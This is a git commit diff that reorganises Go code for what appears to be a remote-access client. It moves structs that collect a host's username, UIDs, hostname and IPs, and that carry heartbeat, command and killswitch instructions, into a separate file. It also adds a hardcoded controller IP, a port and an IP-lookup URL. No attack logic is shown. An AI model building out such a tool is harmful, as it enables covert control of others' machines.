Re-organize codebase and allow modifying remote IP source
This commit is contained in:
parent
26d86a26a2
commit
478a300174
23
main.go
23
main.go
|
@ -15,31 +15,10 @@ import (
|
||||||
"time"
|
"time"
|
||||||
)
|
)
|
||||||
|
|
||||||
type Client struct {
|
|
||||||
Username string
|
|
||||||
UID string
|
|
||||||
GID string
|
|
||||||
OperatingSystem string
|
|
||||||
Hostname string
|
|
||||||
PublicIP string
|
|
||||||
LocalIP string
|
|
||||||
}
|
|
||||||
|
|
||||||
type Instructions struct {
|
|
||||||
IsHeartbeat bool
|
|
||||||
IsCommand bool
|
|
||||||
IsKillswitch bool
|
|
||||||
Message string
|
|
||||||
}
|
|
||||||
|
|
||||||
type Response struct {
|
|
||||||
Successful bool
|
|
||||||
Message string
|
|
||||||
}
|
|
||||||
|
|
||||||
var (
|
var (
|
||||||
RemoteIP = "192.168.1.181"
|
RemoteIP = "192.168.1.181"
|
||||||
RemotePort = "1302"
|
RemotePort = "1302"
|
||||||
|
Remote_IP_Requester = "https://ip.bulgariu.xyz"
|
||||||
)
|
)
|
||||||
|
|
||||||
func main() {
|
func main() {
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
package main
|
||||||
|
|
||||||
|
type Client struct {
|
||||||
|
Username string
|
||||||
|
UID string
|
||||||
|
GID string
|
||||||
|
OperatingSystem string
|
||||||
|
Hostname string
|
||||||
|
PublicIP string
|
||||||
|
LocalIP string
|
||||||
|
}
|
||||||
|
|
||||||
|
type Instructions struct {
|
||||||
|
IsHeartbeat bool
|
||||||
|
IsCommand bool
|
||||||
|
IsKillswitch bool
|
||||||
|
Message string
|
||||||
|
}
|
||||||
|
|
||||||
|
type Response struct {
|
||||||
|
Successful bool
|
||||||
|
Message string
|
||||||
|
}
|
Loading…
Reference in New Issue